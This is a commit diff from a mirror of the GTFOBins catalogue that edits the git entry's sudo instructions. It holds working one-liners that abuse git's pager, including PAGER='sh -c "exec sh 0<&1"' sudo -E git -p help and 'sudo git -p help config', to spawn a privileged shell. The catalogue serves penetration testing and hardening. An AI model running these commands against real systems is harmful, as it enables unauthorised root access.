1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

Updating git sudo to not drop capabilities

Close #66
This commit is contained in:
Léo Meira Vital 2019-07-08 13:59:40 -03:00 committed by Andrea Cardaci
parent aa08187718
commit bd1d10bd03

@ -8,9 +8,9 @@ functions:
!/bin/sh
sudo:
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. Several capabilities might be dropped in the child process using this method.
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo git help config
sudo git -p help config
!/bin/sh
limited-suid:
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help